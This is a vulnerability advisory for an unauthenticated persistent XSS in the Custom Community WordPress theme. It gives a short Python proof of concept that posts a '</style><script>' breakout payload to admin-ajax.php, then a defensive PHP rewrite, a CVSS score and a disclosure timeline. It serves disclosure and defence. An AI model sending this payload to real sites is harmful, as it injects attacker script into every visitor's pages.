Custom Community 2.0 - 2.0.24, Persistent XSS
An AJAX action named ‘cc2_advanced_settings_save’ is registered both with and without the ‘nopriv’ prefix, so unauthenticated visitors can execute it. The ‘settings[custom_css]’ form field accepts user input without encoding or validation. That input is then output on every page of the site's front-end for as long as the Theme is active. The result is a site-wide, Persistent XSS vulnerability.
Homepage
https://wordpress.org/themes/custom-community
CVSS Score
5
CVSS Vector
(AV:N/AC:L/Au:N/C:N/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 2.0.25.
Proof of Concept
The PoC below inserts a script block into every page on the front-end of the site, so long as this Theme is active.
import requests

# admin-ajax.php dispatches both wp_ajax_* and wp_ajax_nopriv_* hooks;
# because the action is registered under the nopriv hook, no login is needed.
url = "http://localhost/wp-admin/admin-ajax.php"
payload = {
    "action": "cc2_advanced_settings_save",
    # Closes the <style> element the theme prints the value into,
    # injects a script, then reopens <style> so the page still parses.
    "settings[custom_css]": "</style><script>alert(1)</script><style>",
}
requests.post(url, data=payload)
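For comparison, the following is an added example of how a handler of this kind is written defensively; it is not the Custom Community theme's own code and not the fix shipped in 2.0.25. It addresses the three weaknesses the description names: the action is registered only for logged-in users (no ‘nopriv’ hook), the request must carry a nonce and a capability, and the CSS is stripped of markup before storage and attached to a registered stylesheet handle rather than echoed raw. The function, option, nonce and stylesheet handle names (‘example_…’, ‘example-theme-style’) are assumptions chosen for illustration.

```php
<?php
// Added example, not the theme's code. Names prefixed "example_" are assumptions.

// Register for authenticated users only: there is deliberately no
// wp_ajax_nopriv_ registration, so anonymous visitors cannot reach the action.
add_action( 'wp_ajax_cc2_advanced_settings_save', 'example_cc2_advanced_settings_save' );

function example_cc2_advanced_settings_save() {
    // Reject requests without a valid nonce (stops cross-site request forgery
    // through an administrator's browser). Dies with a 403 on failure.
    check_ajax_referer( 'example_cc2_settings_nonce', 'nonce' );

    // Only users who may edit theme options may change front-end CSS.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $settings = ( isset( $_POST['settings'] ) && is_array( $_POST['settings'] ) ) ? $_POST['settings'] : array();
    $raw_css  = isset( $settings['custom_css'] ) ? wp_unslash( $settings['custom_css'] ) : '';

    $css = example_sanitize_custom_css( $raw_css );
    if ( is_wp_error( $css ) ) {
        wp_send_json_error( $css->get_error_message(), 400 );
    }

    update_option( 'example_cc2_custom_css', $css );
    wp_send_json_success();
}

// CSS never legitimately contains HTML tags, so stripping them loses nothing
// and removes the "</style><script>" breakout used in the PoC above. Any
// remaining "</" sequence is refused rather than silently repaired.
function example_sanitize_custom_css( $css ) {
    $css = wp_strip_all_tags( $css );
    if ( false !== stripos( $css, '</' ) ) {
        return new WP_Error( 'invalid_css', 'Markup is not allowed in custom CSS.' );
    }
    return $css;
}

// Output side: attach the stored CSS to an already-enqueued stylesheet handle
// (assumed here to be 'example-theme-style') instead of printing it raw.
add_action( 'wp_enqueue_scripts', 'example_cc2_print_custom_css' );

function example_cc2_print_custom_css() {
    $css = get_option( 'example_cc2_custom_css', '' );
    if ( '' !== $css ) {
        wp_add_inline_style( 'example-theme-style', $css );
    }
}
```

The nonce must be generated server-side with wp_create_nonce( 'example_cc2_settings_nonce' ) and sent by the settings page's JavaScript in the ‘nonce’ field; without it check_ajax_referer() terminates the request. Note that escaping functions such as esc_html() are the wrong tool for a CSS context, since they would mangle legitimate selectors containing ‘>’; removing tags and rejecting residual ‘</’ keeps the value inside the style element it is printed into.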
Timeline
- 2015-01-22: Discovered
- 2015-01-22: Vendor notified
- 2015-01-22: Vendor responded
- 2015-01-29: CVE Requested
- 2015-02-04: 2.0.24 from WordPress.org re-checked – still vulnerable. 2.0.24 on WordPress.org does not match up with 2.0.24 on https://github.com/Themekraft/Custom-Community. 2.0.24 from github.com also likely still vulnerable using other parameters (authorisation required – any user level).
- 2015-03-02: 2.0.25 released – issue resolved
- 2015-03-09: Advisory released